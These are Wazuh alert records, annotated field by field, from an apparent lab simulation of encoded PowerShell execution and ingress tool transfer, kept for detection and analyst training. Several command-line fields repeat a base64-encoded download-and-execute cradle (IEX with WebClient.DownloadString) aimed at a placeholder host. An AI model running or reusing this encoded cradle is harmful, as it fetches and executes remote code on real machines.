data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcf8-680a-f10a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 9540 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 42 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534226.1251153 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:44.7394845Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283087 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:44.700
ProcessGuid: {94294ddc-bcfb-680a-f30a-000000000e00}
ProcessId: 13808
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_zlhbjab1.ofo.ps1
CreationUtcTime: 2025-04-24 22:36:44.700
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:44.700 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcfb-680a-f30a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13808 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_zlhbjab1.ofo.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:44.700 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 39 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534228.1253922 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:48.9978915Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283194 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:46.080
ProcessGuid: {94294ddc-bcfe-680a-020b-000000000e00}
ProcessId: 12224
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcfb-680a-f30a-000000000e00}
ParentProcessId: 13808
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:46.080 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcfe-680a-020b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12224 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcfb-680a-f30a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 13808 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 43 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534228.1261993 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:49.2137491Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283195 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:49.197
ProcessGuid: {94294ddc-bcfe-680a-020b-000000000e00}
ProcessId: 12224
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_haclrpxn.hq3.ps1
CreationUtcTime: 2025-04-24 22:36:49.197
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:49.197 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcfe-680a-020b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12224 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_haclrpxn.hq3.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:49.197 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 40 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534228.1264762 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:51.5380699Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283230 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:50.192
ProcessGuid: {94294ddc-bd02-680a-0b0b-000000000e00}
ProcessId: 10808
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcfe-680a-020b-000000000e00}
ParentProcessId: 12224
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:50.192 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd02-680a-0b0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10808 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcfe-680a-020b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 12224 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 44 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534228.1272833 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
